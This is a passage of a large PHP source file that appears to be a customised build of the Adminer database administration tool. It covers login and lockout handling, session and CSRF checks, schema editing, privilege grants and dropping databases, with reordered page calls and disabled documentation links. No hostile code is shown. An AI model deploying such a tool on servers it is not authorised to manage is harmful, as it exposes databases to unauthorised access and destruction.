  8025. $Dg=serialize($Ad);
  8026. rewind($Vc);
  8027. fwrite($Vc,$Dg);
  8028. ftruncate($Vc, strlen($Dg));
  8029. flock($Vc, LOCK_UN);
  8030. fclose($Vc);
  8031. }
  8032.  
  8033.  
  8034. $Ja=$_POST["auth"];
  8035. if($Ja) {
  8036. $Ad=unserialize(@file_get_contents(get_temp_dir()."/adminer.invalid"));
  8037. $_d=$Ad[$b->bruteForceKey()];
  8038. $Fe=($_d[1]>30?$_d[0]-time():0);
  8039. if($Fe>0)
  8040. auth_error(lang(array('Too many unsuccessful logins, try again in %d minute.','Too many unsuccessful logins, try again in %d minutes.'), ceil($Fe/60)));
  8041. session_regenerate_id();
  8042. $ii=$Ja["driver"];
  8043. $N=$Ja["server"];
  8044. $V=$Ja["username"];
  8045. $G=(string) $Ja["password"];
  8046. $m=$Ja["db"];
  8047. set_password($ii,$N,$V,$G);
  8048. $_SESSION["db"][$ii][$N][$V][$m]=true;
  8049. if($Ja["permanent"]) {
  8050. $y=base64_encode($ii)."-".base64_encode($N)."-".base64_encode($V)."-".base64_encode($m);
  8051. $Kf=$b->permanentLogin(true);
  8052. $zf[$y]="$y:".base64_encode($Kf?encrypt_string($G,$Kf):"");
  8053. cookie("adminer_permanent",implode(" ",$zf));
  8054. }
  8055. if(count($_POST)==1||DRIVER!=$ii||SERVER!=$N||$_GET["username"]!==$V||DB!=$m)
  8056. redirect(auth_url($ii,$N,$V,$m));
  8057. }elseif($_POST["logout"]) {
  8058. if($gd&&!verify_token()) {
  8059. page_footer("db");
  8060. page_header('Logout','Invalid CSRF token. Send the form again.');
  8061.  
  8062. exit;
  8063. }else{
  8064. foreach(array("pwds","db","dbs","queries") as $y)
  8065. set_session($y, null);
  8066. unset_permanent();
  8067. redirect(substr(preg_replace('~\b(username|db|ns)=[^&]*&~','', ME), 0, -1), 'Logout successful.');
  8068. }
  8069. }elseif($zf&&!$_SESSION["pwds"]) {
  8070. session_regenerate_id();
  8071. $Kf=$b->permanentLogin();
  8072. foreach($zf as $y=>$X) {
  8073. list(,$gb)=explode(":",$X);
  8074. list($ii,$N,$V,$m)=array_map('base64_decode', explode("-",$y));
  8075. set_password($ii,$N,$V, decrypt_string(base64_decode($gb),$Kf));
  8076. $_SESSION["db"][$ii][$N][$V][$m]=true;
  8077. }
  8078. }
  8079.  
  8080.  
  8081.  
  8082. function unset_permanent() {
  8083. global $zf;
  8084. foreach($zf as $y=>$X) {
  8085. list($ii,$N,$V,$m)=array_map('base64_decode', explode("-",$y));
  8086. if($ii==DRIVER&&$N==SERVER&&$V==$_GET["username"]&&$m==DB)
  8087. unset($zf[$y]);
  8088. }
  8089. cookie("adminer_permanent",implode(" ",$zf));
  8090. }
  8091.  
  8092.  
  8093. function auth_error($n) {
  8094. global $b,$gd;
  8095. $Gg=session_name();
  8096. if(isset($_GET["username"])) {
  8097. header("HTTP/1.1 403 Forbidden");
  8098. if(($_COOKIE[$Gg]||$_GET[$Gg])&&!$gd)
  8099. $n='Session expired, please login again.';
  8100. else {
  8101. add_invalid_login();
  8102. $G=get_password();
  8103. if($G!==null) {
  8104. if($G===false)
  8105. $n.='<br>'.sprintf('Master password expired. <a href="https://www.adminer.org/en/extension/" target="_blank">Implement</a> %s method to make it permanent.','<span class=cod>permanentLogin()</span>');
  8106. set_password(DRIVER, SERVER,$_GET["username"], null);
  8107. }
  8108. unset_permanent();
  8109. }
  8110. }
  8111. if(!$_COOKIE[$Gg]&&$_GET[$Gg]&&ini_bool("session.use_only_cookies"))
  8112. $n='Session support must be enabled.';
  8113. $F=session_get_cookie_params();
  8114. cookie("adminer_key",($_COOKIE["adminer_key"]?$_COOKIE["adminer_key"]:rand_string()),$F["lifetime"]);
  8115. page_footer("auth");
  8116. page_header('Login',$n, null);
  8117. echo "<form action='' method='post'>\n";
  8118. $b->loginForm();
  8119. echo "<div>";
  8120. hidden_fields($_POST, array("auth"));
  8121. echo "</div>\n","</form>\n";
  8122. exit;
  8123. }
  8124.  
  8125. if(isset($_GET["username"])) {
  8126. if(!class_exists("Min_DB")) {
  8127. unset($_SESSION["pwds"][DRIVER]);
  8128. unset_permanent();
  8129. page_footer("auth");
  8130. page_header('No extension', sprintf('None of the supported PHP extensions (%s) are available.', implode(",",$Ef)), false);
  8131. exit;
  8132. }
  8133. $g=connect();
  8134. }
  8135.  
  8136. $Vb=new Min_Driver($g);
  8137. if(!is_object($g)||($ce=$b->login($_GET["username"], get_password()))!==true)
  8138. auth_error((is_string($g)?h($g):(is_string($ce)?$ce:'Invalid credentials.')));
  8139. if($Ja&&$_POST["token"])
  8140. $_POST["token"]=$Ah;
  8141. $n='';
  8142.  
  8143. if($_POST) {
  8144. if(!verify_token()) {
  8145. $vd="max_input_vars";
  8146. $ne=ini_get($vd);
  8147. if(extension_loaded("suhosin")) {
  8148. foreach(array("suhosin.request.max_vars","suhosin.post.max_vars") as $y) {
  8149. $X=ini_get($y);
  8150. if($X&&(!$ne||$X<$ne)) {
  8151. $vd=$y;
  8152. $ne=$X;
  8153. }
  8154. }
  8155. }
  8156. $n=(!$_POST["token"]&&$ne?sprintf('Maximum number of allowed fields exceeded. Please increase %s.', "'$vd'"):'Invalid CSRF token. Send the form again.'.' '.'If you did not send this request from Adminer then close this page.');
  8157. }
  8158. }elseif($_SERVER["REQUEST_METHOD"]=="POST") {
  8159. $n=sprintf('Too big POST data. Reduce the data or increase the %s configuration directive.', "'post_max_size'");
  8160. if(isset($_GET["sql"]))
  8161. $n.=' '.'You can upload a big SQL file via FTP and import it from server.';
  8162. }
  8163.  
  8164. if(!ini_bool("session.use_cookies")||@ini_set("session.use_cookies",false)!==false)
  8165. session_write_close();
  8166.  
  8167. function select($I,$h=null,$df=array(),$z=0) {
  8168. global $x;
  8169. $be=array();
  8170. $w=array();
  8171. $f=array();
  8172. $Sa=array();
  8173. $Oh=array();
  8174. $J=array();
  8175. odd('');
  8176. for($s=0; (!$z||$s<$z)&&($K=$I->fetch_row()); $s++) {
  8177. if(!$s) {
  8178. echo "<table id='menustable' cellspacing='0' class='nowrap' border='1'>\n","<thead><tr>";
  8179. for($Hd=0; $Hd<count($K); $Hd++) {
  8180. $o=$I->fetch_field();
  8181. $C=$o->name;
  8182. $cf=$o->orgtable;
  8183. $bf=$o->orgname;
  8184. $J[$o->table]=$cf;
  8185. if($df&&$x=="sql")
  8186. $be[$Hd]=($C=="table"?"table=":($C=="possible_keys"?"indexes=":null));
  8187. elseif($cf!="") {
  8188. if(!isset($w[$cf])) {
  8189. $w[$cf]=array();
  8190. foreach(indexes($cf,$h) as $v) {
  8191. if($v["type"]=="PRIMARY") {
  8192. $w[$cf]=array_flip($v["columns"]);
  8193. break;
  8194. }
  8195. }
  8196. $f[$cf]=$w[$cf];
  8197. }
  8198. if(isset($f[$cf][$bf])) {
  8199. unset($f[$cf][$bf]);
  8200. $w[$cf][$bf]=$Hd;
  8201. $be[$Hd]=$cf;
  8202. }
  8203. }
  8204. if($o->charsetnr==63)
  8205. $Sa[$Hd]=true;
  8206. $Oh[$Hd]=$o->type;
  8207. echo "<th".($cf!=""||$o->name!=$bf?" title='".h(($cf!=""?"$cf.":"").$bf)."'":"").">".h($C).($df?doc_link(array('sql'=>"explain-output.html#explain_".strtolower($C))):"");
  8208. }
  8209. echo "</thead>\n";
  8210. }
  8211. echo "<tr".odd().">";
  8212. foreach($K as $y=>$X) {
  8213. if($X===null)
  8214. $X="<i>NULL</i>";
  8215. elseif($Sa[$y]&&!is_utf8($X))
  8216. $X="<i>".lang(array('%d byte','%d bytes'), strlen($X))."</i>";
  8217. elseif(!strlen($X))
  8218. $X="&nbsp;";
  8219. else {
  8220. $X=h($X);
  8221. if($Oh[$y]==254)
  8222. $X="<span class=cod>$X</span>";
  8223. }
  8224. if(isset($be[$y])&&!$f[$be[$y]]) {
  8225. if($df&&$x=="sql") {
  8226. $R=$K[array_search("table=",$be)];
  8227. $_=$be[$y].urlencode($df[$R]!=""?$df[$R]:$R);
  8228. }else{
  8229. $_="edit=".urlencode($be[$y]);
  8230. foreach($w[$be[$y]] as $kb=>$Hd)
  8231. $_.="&where".urlencode("[".bracket_escape($kb)."]")."=".urlencode($K[$Hd]);
  8232. }
  8233. $X="<a href='".h(ME.$_)."'>$X</a>";
  8234. }
  8235. echo "<td>$X";
  8236. }
  8237. }
  8238. echo ($s?"</table>":"<p class='message'>".'No rows.')."\n";
  8239. return $J;
  8240. }
  8241.  
  8242.  
  8243. function referencable_primary($_g) {
  8244. $J=array();
  8245. foreach(table_status('', true) as $dh=>$R) {
  8246. if($dh!=$_g&&fk_support($R)) {
  8247. foreach(fields($dh) as $o) {
  8248. if($o["primary"]) {
  8249. if($J[$dh]) {
  8250. unset($J[$dh]);
  8251. break;
  8252. }
  8253. $J[$dh]=$o;
  8254. }
  8255. }
  8256. }
  8257. }
  8258. return $J;
  8259. }
  8260.  
  8261.  
  8262. function textarea($C,$Y,$L=10,$nb=80) {
  8263. global $x;
  8264. echo "<textarea name='$C' rows='$L' cols='$nb' class='sqlarea jush-$x' spellcheck='false' wrap='off'>";
  8265. if(is_array($Y)) {
  8266. foreach($Y as $X)
  8267. echo h($X[0])."\n\n\n";
  8268. } else
  8269. echo h($Y);
  8270. echo "</textarea>";
  8271. }
  8272.  
  8273.  
  8274. function edit_type($y,$o,$mb,$Rc=array()) {
  8275. global $Vg,$Oh,$Vh,$Qe;
  8276. $U=$o["type"];
  8277. echo '<td><select name="', h($y), '[type]" class="type" onfocus="lastType = selectValue(this);" onchange="editingTypeChange(this);"', on_help("getTarget(event).value",1), ' aria-labelledby="label-type">';
  8278. if($U&&!isset($Oh[$U])&&!isset($Rc[$U]))
  8279. array_unshift($Vg,$U);
  8280. if($Rc)
  8281. $Vg['Foreign keys']=$Rc;
  8282. echo optionlist($Vg,$U), '</select>
  8283. <td><input type="text" name="', h($y), '[length]" value="', h($o["length"]), '" size="3" onfocus="editingLengthFocus(this);"', (!$o["length"]&&preg_match('~var(char|binary)$~',$U)?" class='required'":""), ' onchange="editingLengthChange(this);" onkeyup="this.onchange();" aria-labelledby="label-length"><td class="options">';
  8284. echo "<select name='".h($y)."[collation]'".(preg_match('~(char|text|enum|set)$~',$U)?"":" class='hidden'").'><option value="">('.'collation'.')'.optionlist($mb,$o["collation"]).'</select>', ($Vh?"<select name='".h($y)."[unsigned]'".(!$U||preg_match('~((^|[^o])int|float|double|decimal)$~',$U)?"":" class='hidden'").'><option>'.optionlist($Vh,$o["unsigned"]).'</select>':''),(isset($o['on_update'])?"<select name='".h($y)."[on_update]'".(preg_match('~timestamp|datetime~',$U)?"":" class='hidden'").'>'.optionlist(array(""=>"(".'ON UPDATE'.")","CURRENT_TIMESTAMP"),$o["on_update"]).'</select>':''),($Rc?"<select name='".h($y)."[on_delete]'".(preg_match("~`~",$U)?"":" class='hidden'")."><option value=''>(".'ON DELETE'.")".optionlist(explode("|",$Qe),$o["on_delete"])."</select> ":" ");
  8285. }
  8286.  
  8287.  
  8288. function process_length($Yd) {
  8289. global $oc;
  8290. return (preg_match("~^\\s*\\(?\\s*$oc(?:\\s*,\\s*$oc)*+\\s*\\)?\\s*\$~",$Yd)&&preg_match_all("~$oc~",$Yd,$he)?"(".implode(",",$he[0]).")":preg_replace('~^[0-9].*~','(\0)', preg_replace('~[^-0-9,+()[\]]~','',$Yd)));
  8291. }
  8292.  
  8293.  
  8294. function process_type($o,$lb="COLLATE") {
  8295. global $Vh;
  8296. return " $o[type]".process_length($o["length"]).(preg_match('~(^|[^o])int|float|double|decimal~',$o["type"])&&in_array($o["unsigned"],$Vh)?" $o[unsigned]":"").(preg_match('~char|text|enum|set~',$o["type"])&&$o["collation"]?" $lb ".q($o["collation"]):"");
  8297. }
  8298.  
  8299.  
  8300. function process_field($o,$Mh) {
  8301. global $x;
  8302. $Kb=$o["default"];
  8303. return array(idf_escape(trim($o["field"])),process_type($Mh),($o["null"]?" NULL":" NOT NULL"),(isset($Kb)?" DEFAULT ".((preg_match('~time~',$o["type"])&&preg_match('~^CURRENT_TIMESTAMP$~i',$Kb))||($x=="sqlite"&&preg_match('~^CURRENT_(TIME|TIMESTAMP|DATE)$~i',$Kb))||($o["type"]=="bit"&&preg_match("~^([0-9]+|b'[0-1]+')\$~",$Kb))||($x=="pgsql"&&preg_match("~^[a-z]+\\(('[^']*')+\\)\$~",$Kb))?$Kb:q($Kb)):""),(preg_match('~timestamp|datetime~',$o["type"])&&$o["on_update"]?" ON UPDATE $o[on_update]":""),(support("comment")&&$o["comment"]!=""?" COMMENT ".q($o["comment"]):""),($o["auto_increment"]?auto_increment():null));
  8304. }
  8305.  
  8306.  
  8307. function type_class($U) {
  8308. foreach(array('char'=>'text','date'=>'time|year','binary'=>'blob','enum'=>'set') as $y=>$X) {
  8309. if(preg_match("~$y|$X~",$U))
  8310. return " class='$y'";
  8311. }
  8312. }
  8313.  
  8314.  
  8315. function edit_fields($p,$mb,$U="TABLE",$Rc=array(),$rb=false) {
  8316. global $g,$wd;
  8317. $p=array_values($p);
  8318. echo '<thead><tr class="wrap">';
  8319. if($U=="PROCEDURE") {
  8320. echo '<td>&nbsp;';
  8321. }
  8322. echo '<th id="label-name">', ($U=="TABLE"?'Column name':'Parameter name'), '<td id="label-type">Type<textarea id="enum-edit" rows="4" cols="12" wrap="off" style="display: none;" onblur="editingLengthBlur(this);"></textarea>
  8323. <td id="label-length">Length
  8324. <td>','Options';
  8325. if($U=="TABLE") {
  8326. echo '<td id="label-null">NULL
  8327. <td><input type="radio" name="auto_increment_col" value=""><acronym id="label-ai" title="Auto Increment">AI</acronym>', doc_link(array('sql'=>"example-auto-increment.html",'sqlite'=>"autoinc.html",'pgsql'=>"datatype.html#DATATYPE-SERIAL",'mssql'=>"ms186775.aspx")), '<td id="label-default">Default value',(support("comment")?"<td id='label-comment'".($rb?"":" class='hidden'").">".'Comment':"");
  8328. }
  8329. echo '<td>', "<input type='image' class='icon' name='add[".(support("move_col")?0:count($p))."]' src='data:image/png;base64,R0lGODlhEgASAIEAMe7u7gAAgJmZmQAAACH5BAEAAAEALAAAAAASABIAAQIhhI+py+0PTQjxzCopvm/6rykgCHGVGaFliLXuI8TyTMsFADs=' alt='+' title='".'Add next'."'>",'<script type="text/javascript">row_count = ', count($p), ';</script>
  8330. </thead><tbody onkeydown="return editingKeydown(event);">';
  8331. foreach($p as $s=>$o) {
  8332. $s++;
  8333. $ef=$o[($_POST?"orig":"field")];
  8334. $Rb=(isset($_POST["add"][$s-1])||(isset($o["field"])&&!$_POST["drop_col"][$s]))&&(support("drop_col")||$ef=="");
  8335. echo '<tr', ($Rb?"":" style='display: none;'"), '>', ($U=="PROCEDURE"?"<td>".html_select("fields[$s][inout]",explode("|",$wd),$o["inout"]):""), '<td>';
  8336. if($Rb) {
  8337. echo '<input type="text" name="fields[',$s, '][field]" value="', h($o["field"]), '" onchange="editingNameChange(this);', ($o["field"]!=""||count($p)>1?'':' editingAddRow(this);" onkeyup="if (this.value) editingAddRow(this);'), '" maxlength="64" autocapitalize="off" aria-labelledby="label-name">';
  8338. }
  8339. echo '<input type="hidden" name="fields[',$s, '][orig]" value="', h($ef), '">';
  8340. edit_type("fields[$s]",$o,$mb,$Rc);
  8341. if($U=="TABLE") {
  8342. echo '<td>', checkbox("fields[$s][null]",1,$o["null"], "","","block","label-null"), '<td><label class="block"><input type="radio" name="auto_increment_col" value="',$s, '"';
  8343. if($o["auto_increment"]) {
  8344. echo ' checked';
  8345. }
  8346. ?> onclick="var field = this.form['fields[' + this.value + '][field]']; if (!field.value) { field.value = 'id'; field.onchange(); }" aria-labelledby="label-ai"></label><td><?php
  8347. echo checkbox("fields[$s][has_default]",1,$o["has_default"], "","","","label-default"), '<input type="text" name="fields[',$s, '][default]" value="', h($o["default"]), '" onkeyup="keyupChange.call(this);" onchange="this.previousSibling.checked = true;" aria-labelledby="label-default">
  8348. ', (support("comment")?"<td".($rb?"":" class='hidden'")."><input type='text' name='fields[$s][comment]' value='".h($o["comment"])."' maxlength='".($g->server_info>=5.5?1024:255)."' aria-labelledby='label-comment'>":"");
  8349. }
  8350. echo "<td>",(support("move_col")?"<input type='image' class='icon' name='add[$s]' src='data:image/png;base64,R0lGODlhEgASAIEAMe7u7gAAgJmZmQAAACH5BAEAAAEALAAAAAASABIAAQIhhI+py+0PTQjxzCopvm/6rykgCHGVGaFliLXuI8TyTMsFADs=' alt='+' title='".'Add next'."' onclick='return !editingAddRow(this, 1);'>&nbsp;"."<input type='image' class='icon' name='up[$s]' src='data:image/png;base64,R0lGODlhEgASAIEAMe7u7gAAgJmZmQAAACH5BAEAAAEALAAAAAASABIAAQIghI+py+0PTQhRTgrvfRP0nmEVOIoReZphxbauAMfyHBcAOw==' alt='^' title='".'Move up'."' onclick='return !editingMoveRow(this, 1);'>&nbsp;"."<input type='image' class='icon' name='down[$s]' src='data:image/png;base64,R0lGODlhEgASAIEAMe7u7gAAgJmZmQAAACH5BAEAAAEALAAAAAASABIAAQIghI+py+0PTQjxzCopvltX/lyix0wm2ZwdxraVAMfyHBcAOw==' alt='v' title='".'Move down'."' onclick='return !editingMoveRow(this, 0);'>&nbsp;":""),($ef==""||support("drop_col")?"<input type='image' class='icon' name='drop_col[$s]' src='data:image/png;base64,R0lGODlhEgASAIEAMe7u7gAAgJmZmQAAACH5BAEAAAEALAAAAAASABIAAQIjhI+py+0PIwph1kZvfnnDLoFfd2GU4THnsUruC0fCTNc2XQAAOw==' alt='x' title='".'Remove'."' onclick=\"return !editingRemoveRow(this, 'fields\$1[field]');\">":""), "\n";
  8351. }
  8352. }
  8353.  
  8354.  
  8355. function process_fields(&$p) {
  8356. $D=0;
  8357. if($_POST["up"]) {
  8358. $Sd=0;
  8359. foreach($p as $y=>$o) {
  8360. if(key($_POST["up"])==$y) {
  8361. unset($p[$y]);
  8362. array_splice($p,$Sd,0,array($o));
  8363. break;
  8364. }
  8365. if(isset($o["field"]))
  8366. $Sd=$D;
  8367. $D++;
  8368. }
  8369. }elseif($_POST["down"]) {
  8370. $Tc=false;
  8371. foreach($p as $y=>$o) {
  8372. if(isset($o["field"])&&$Tc) {
  8373. unset($p[key($_POST["down"])]);
  8374. array_splice($p,$D, 0, array($Tc));
  8375. break;
  8376. }
  8377. if(key($_POST["down"])==$y)
  8378. $Tc=$o;
  8379. $D++;
  8380. }
  8381. }elseif($_POST["add"]) {
  8382. $p=array_values($p);
  8383. array_splice($p, key($_POST["add"]),0,array(array()));
  8384. }elseif(!$_POST["drop_col"])
  8385. return false;
  8386. return true;
  8387. }
  8388.  
  8389.  
  8390. function normalize_enum($B) {
  8391. return "'".str_replace("'","''",addcslashes(stripcslashes(str_replace($B[0][0].$B[0][0],$B[0][0], substr($B[0], 1, -1))), '\\'))."'";
  8392. }
  8393.  
  8394. function grant($Yc,$Mf,$f,$Pe) {
  8395. if(!$Mf)
  8396. return true;
  8397. if($Mf==array("ALL PRIVILEGES","GRANT OPTION"))
  8398. return ($Yc=="GRANT"?queries("$Yc ALL PRIVILEGES$Pe WITH GRANT OPTION"):queries("$Yc ALL PRIVILEGES$Pe")&&queries("$Yc GRANT OPTION$Pe"));
  8399. return queries("$Yc ".preg_replace('~(GRANT OPTION)\\([^)]*\\)~','\\1', implode("$f, ",$Mf).$f).$Pe);
  8400. }
  8401.  
  8402. function drop_create($Xb,$i,$Yb,$ph,$ac,$A,$se,$qe,$re,$Me,$Ce) {
  8403. if($_POST["drop"])
  8404. query_redirect($Xb,$A,$se);
  8405. elseif($Me=="")
  8406. query_redirect($i,$A,$re);
  8407. elseif($Me!=$Ce) {
  8408. $Bb=queries($i);
  8409. queries_redirect($A,$qe,$Bb&&queries($Xb));
  8410. if($Bb)
  8411. queries($Yb);
  8412. } else
  8413. queries_redirect($A,$qe, queries($ph)&&queries($ac)&&queries($Xb)&&queries($i));
  8414. }
  8415.  
  8416. function create_trigger($Pe,$K) {
  8417. global $x;
  8418. $uh=" $K[Timing] $K[Event]".($K["Event"]=="UPDATE OF"?" ".idf_escape($K["Of"]):"");
  8419. return "CREATE TRIGGER ".idf_escape($K["Trigger"]).($x=="mssql"?$Pe.$uh:$uh.$Pe).rtrim(" $K[Type]\n$K[Statement]",";").";";
  8420. }
  8421.  
  8422. function create_routine($og,$K) {
  8423. global $wd;
  8424. $O=array();
  8425. $p=(array) $K["fields"];
  8426. ksort($p);
  8427. foreach($p as $o) {
  8428. if($o["field"]!="")
  8429. $O[]=(preg_match("~^($wd)\$~",$o["inout"])?"$o[inout] ":"").idf_escape($o["field"]).process_type($o, "CHARACTER SET");
  8430. }
  8431. return "CREATE $og ".idf_escape(trim($K["name"]))." (".implode(",",$O).")".(isset($_GET["function"])?" RETURNS".process_type($K["returns"], "CHARACTER SET"):"").($K["language"]?" LANGUAGE $K[language]":"").rtrim("\n$K[definition]",";").";";
  8432. }
  8433.  
  8434. function remove_definer($H) {
  8435. return preg_replace('~^([A-Z =]+) DEFINER=`'.preg_replace('~@(.*)~','`@`(%|\\1)', logged_user()).'`~','\\1',$H);
  8436. }
  8437.  
  8438. function format_foreign_key($q) {
  8439. global $Qe;
  8440. return " FOREIGN KEY (".implode(",",array_map('idf_escape',$q["source"])).") REFERENCES ".table($q["table"])." (".implode(",",array_map('idf_escape',$q["target"])).")".(preg_match("~^($Qe)\$~",$q["on_delete"])?" ON DELETE $q[on_delete]":"").(preg_match("~^($Qe)\$~",$q["on_update"])?" ON UPDATE $q[on_update]":"");
  8441. }
  8442.  
  8443. function tar_file($Ic,$zh) {
  8444. $J=pack("a100a8a8a8a12a12",$Ic, 644, 0, 0, decoct($zh->size), decoct(time()));
  8445. $eb=8*32;
  8446. for($s=0; $s<strlen($J); $s++)
  8447. $eb+=ord($J[$s]);
  8448. $J.=sprintf("%06o",$eb)."\0 ";
  8449. echo $J, str_repeat("\0",512-strlen($J));
  8450. $zh->send();
  8451. echo str_repeat("\0",511-($zh->size+511)%512);
  8452. }
  8453.  
  8454. function ini_bytes($vd) {
  8455. $X=ini_get($vd);
  8456. switch(strtolower(substr($X, -1))) {
  8457. case 'g':
  8458. $X*=1024;
  8459. case 'm':
  8460. $X*=1024;
  8461. case 'k':
  8462. $X*=1024;
  8463. }
  8464. return $X;
  8465. }
  8466.  
  8467. function doc_link($xf) {
  8468. global $x,$g;
  8469. $Zh=array('sql'=>"http://dev.mysql.com/doc/refman/".substr($g->server_info, 0, 3)."/en/",'sqlite'=>"http://www.sqlite.org/",'pgsql'=>"http://www.postgresql.org/docs/".substr($g->server_info, 0, 3)."/static/",'mssql'=>"http://msdn.microsoft.com/library/",'oracle'=>"http://download.oracle.com/docs/cd/B19306_01/server.102/b14200/");
  8470. //return ($xf[$x]?"<a href='$Zh[$x]$xf[$x]' target='_blank' rel='noreferrer'><sup>?</sup></a>":"");
  8471. return ($xf[$x]?"":"");
  8472. }
  8473.  
  8474. function ob_gzencode($Q) {
  8475. return gzencode($Q);
  8476. }
  8477.  
  8478. function db_size($m) {
  8479. global $g;
  8480. if(!$g->select_db($m))
  8481. return "?";
  8482. $J=0;
  8483. foreach(table_status() as $S)
  8484. $J+=$S["Data_length"]+$S["Index_length"];
  8485. return format_number($J);
  8486. }
  8487.  
  8488. function set_utf8mb4($i) {
  8489. global $g;
  8490. static $O=false;
  8491. if(!$O&&preg_match('~\butf8mb4~i',$i)) {
  8492. $O=true;
  8493. echo "SET NAMES ".charset($g).";\n\n";
  8494. }
  8495. }
  8496.  
  8497. function connect_error() {
  8498. global $b,$g,$Ah,$n,$Wb;
  8499. if(DB!="") {
  8500. header("HTTP/1.1 404 Not Found");
  8501. page_header('Database'.": ".h(DB), 'Invalid database.', true);
  8502. }else{
  8503. if($_POST["db"]&&!$n)
  8504. queries_redirect(substr(ME, 0, -1), 'Databases have been dropped.', drop_databases($_POST["db"]));
  8505. page_footer("db");
  8506. page_header('Select database',$n, false);
  8507. echo "<p class='links'>\n";
  8508. foreach(array('database'=>'Create database','privileges'=>'Privileges','processlist'=>'Process list','variables'=>'Variables','status'=>'Status','replication'=>'Replication') as $y=>$X) {
  8509. if(support($y))
  8510. echo "<a href='".h(ME)."$y='>$X</a>\n";
  8511. }
  8512. echo "<p>".sprintf('%s version: %s through PHP extension %s',$Wb[DRIVER], "<b>".h($g->server_info)."</b>","<b>$g->extension</b>")."\n","<p>".sprintf('Logged as: %s', "<b>".h(logged_user())."</b>")."\n";
  8513. $l=$b->databases();
  8514. if($l) {
  8515. $vg=support("scheme");
  8516. $mb=collations();
  8517. echo "<form action='' method='post'>\n","<table id='menustable' border='1' cellspacing='0' class='checkable' onclick='tableClick(event);' ondblclick='tableClick(event, true);'>\n","<thead><tr>".(support("database")?"<td>&nbsp;":"")."<td>".'Database'." - <a href='".h(ME)."refresh=1'>".'Refresh'."</a>"."<td>".'Collation'."<td>".'Tables'."<td>".'Size'." - <a href='".h(ME)."dbsize=1' onclick=\"return !ajaxSetHtml('".h(js_escape(ME))."script=connect');\">".'Compute'."</a>"."</thead>\n";
  8518. $l=($_GET["dbsize"]?count_tables($l):array_flip($l));
  8519. foreach($l as $m=>$T) {
  8520. $ng=h(ME)."db=".urlencode($m);
  8521. $t=h("Db-".$m);
  8522. echo "<tr".odd().">".(support("database")?"<td>".checkbox("db[]",$m, in_array($m, (array) $_POST["db"]), "","","",$t):""), "<td><a href='$ng' id='$m'>".h($m)."</a>";
  8523. $d=nbsp(db_collation($m,$mb));
  8524. echo "<td>".(support("database")?"<a href='$ng".($vg?"&amp;ns=":"")."&amp;database=' title='".'Alter database'."'>$d</a>":$d), "<td align='right'><a href='$ng&amp;schema=' id='tables-".h($m)."' title='".'Database schema'."'>".($_GET["dbsize"]?$T:"?")."</a>","<td align='right' id='size-".h($m)."'>".($_GET["dbsize"]?db_size($m):"?"), "\n";
  8525. }
  8526. echo "</table>\n",(support("database")?"<fieldset><legend>".'Selected'." <span id='selected'></span></legend><div>\n"."<input type='hidden' name='all' value='' onclick=\"selectCount('selected', formChecked(this, /^db/));\">\n"."<input type='submit' name='drop' value='".'Drop'."'".confirm().">\n"."</div></fieldset>\n":""), "<script type='text/javascript'>tableCheck();</script>\n","<input type='hidden' name='token' value='$Ah'>\n","</form>\n";
  8527. }
  8528. }
  8529.  
  8530. }
  8531.  
  8532. if(isset($_GET["status"]))
  8533. $_GET["variables"]=$_GET["status"];
  8534. if(isset($_GET["import"]))
  8535. $_GET["sql"]=$_GET["import"];
  8536.  
  8537.  
  8538. if(!(DB!=""?$g->select_db(DB):isset($_GET["sql"])||isset($_GET["dump"])||isset($_GET["database"])||isset($_GET["processlist"])||isset($_GET["privileges"])||isset($_GET["user"])||isset($_GET["replication"])||isset($_GET["variables"])||$_GET["script"]=="connect"||$_GET["script"]=="kill")) {
  8539. if(DB!=""||$_GET["refresh"]) {
  8540. restart_session();
  8541. set_session("dbs",null);
  8542. }
  8543. connect_error();
  8544. exit;
  8545. }
  8546.  
  8547. if(support("scheme")&&DB!=""&&$_GET["ns"]!=="") {
  8548. if(!isset($_GET["ns"]))
  8549. redirect(preg_replace('~ns=[^&]*&~','', ME)."ns=".get_schema());
  8550. if(!set_schema($_GET["ns"])) {
  8551. header("HTTP/1.1 404 Not Found");
  8552. page_footer("ns");
  8553. page_header('Schema'.": ".h($_GET["ns"]), 'Invalid schema.', true);
  8554.  
  8555. exit;
  8556. }
  8557. }
  8558.  
  8559. $Qe="RESTRICT|NO ACTION|CASCADE|SET NULL|SET DEFAULT";
  8560.  
  8561. class TmpFile {
  8562. var $handler;
  8563. var $size;
  8564. function __construct() {
  8565. $this->handler=tmpfile();
  8566. }
  8567. function write($wb) {
  8568. $this->size+=strlen($wb);
  8569. fwrite($this->handler,$wb);
  8570. }
  8571. function send() {
  8572. fseek($this->handler, 0);
  8573. fpassthru($this->handler);
  8574. fclose($this->handler);
  8575. }
  8576. }
  8577.  
  8578.  
  8579. $oc="'(?:''|[^'\\\\]|\\\\.)*'";
  8580. $wd="IN|OUT|INOUT";
  8581. if(isset($_GET["select"])&&($_POST["edit"]||$_POST["clone"])&&!$_POST["save"])
  8582. $_GET["edit"]=$_GET["select"];
  8583. if(isset($_GET["callf"]))
  8584. $_GET["call"]=$_GET["callf"];
  8585. if(isset($_GET["function"]))
  8586. $_GET["procedure"]=$_GET["function"];
  8587.  
  8588.  
  8589.  
  8590.  
  8591.  
  8592.  
  8593.  
  8594. //mulai
  8595. page_footer();
  8596. if(isset($_GET["download"])) {
  8597. $a=$_GET["download"];
  8598. $p=fields($a);
  8599. header("Content-Type: application/octet-stream");
  8600. header("Content-Disposition: attachment; filename=".friendly_url("$a-".implode("_",$_GET["where"])).".".friendly_url($_GET["field"]));
  8601. $M=array(idf_escape($_GET["field"]));
  8602. $I=$Vb->select($a,$M,array(where($_GET,$p)),$M);
  8603. $K=($I?$I->fetch_row():array());
  8604. echo $K[0];
  8605. exit;
  8606. }elseif(isset($_GET["table"])) {
  8607. $a=$_GET["table"];
  8608. $p=fields($a);
  8609. if(!$p)
  8610. $n=error();
  8611. $S=table_status1($a, true);
  8612. page_header(($p&&is_view($S)?$S['Engine']=='materialized view'?'Materialized view':'View':'Table').": ".h($a),$n);
  8613. $b->selectLinks($S);
  8614. $qb=$S["Comment"];
  8615. if($qb!="")
  8616. echo "<p>".'Comment'.": ".h($qb)."\n";
  8617. if($p)
  8618. $b->tableStructurePrint($p);
  8619. if(!is_view($S)) {
  8620. if(support("indexes")) {
  8621. echo "<h3 id='indexes'>".'Indexes'."</h3>\n";
  8622. $w=indexes($a);
  8623. if($w)
  8624. $b->tableIndexesPrint($w);
  8625. echo '<p class="links"><a href="'.h(ME).'indexes='.urlencode($a).'">'.'Alter indexes'."</a>\n";
  8626. }
  8627. if(fk_support($S)) {
